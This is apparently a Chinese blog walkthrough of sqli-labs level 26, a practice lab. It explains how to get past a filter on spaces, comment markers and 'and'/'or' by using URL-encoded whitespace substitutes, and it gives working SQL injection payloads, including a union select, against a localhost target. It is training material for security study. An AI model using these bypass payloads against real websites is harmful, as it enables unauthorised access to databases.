Sqli-labs less 26

Less-26

TIPS:本关可能有的朋友在windows下无法使用一些特殊的字符代替空格,此处是因为apache的解析的问题,这里请更换到linux平台下。

本关结合25关,将空格,or,and,/*,#,--,/等各种符号过滤,此处对于and,or的处理方法不再赘述,参考25.此处我们需要说明两方面:对于注释和结尾字符的我们此处只能利用构造一个 ' 来闭合后面到 ' ;对于空格,有较多的方法:

%09 TAB键(水平)

%0a 新建一行

%0c 新的一页

%0d return功能

%0b TAB键(垂直)

%a0 空格

26关,sql语句为SELECT * FROM users WHERE id='$id' LIMIT 0,1

我们首先给出一个最为简单的payload:

http://127.0.0.1/sqllib/Less-26/?id=1'%a0||'1

Explain:'%a0||'1

同时,我们此处的sql语句为SELECT * FROM users WHERE id='1' || '1' LIMIT 0,1

第一个 ' 首先闭合id='$id' 中的',%a0是空格的意思,(ps:此处我的环境是ubuntu14.04+apache+mysql+php,可以解析%a0,此前在windows+wamp测试,不能解析%a0,有知情的请告知。)同时%0b也是可以通过测试的,其他的经测试是不行的。||是或者的意思,'1则是为了闭合后面的 ' 。

因此可以构造类似的语句,http://127.0.0.1/sqllib/Less-26/?id=100%27union%0bselect%a01,2,3||%271

 

 

 

 

接下来只不要更改sql语句即可。按照我们前面所介绍的方法即可。同时,也可以利用报错注入和延时注入等方式进行注入。这里就不进行一一的演示了。

 

posted @ 2016-08-11 22:28  lcamry  阅读(2086)  评论(0编辑  收藏  举报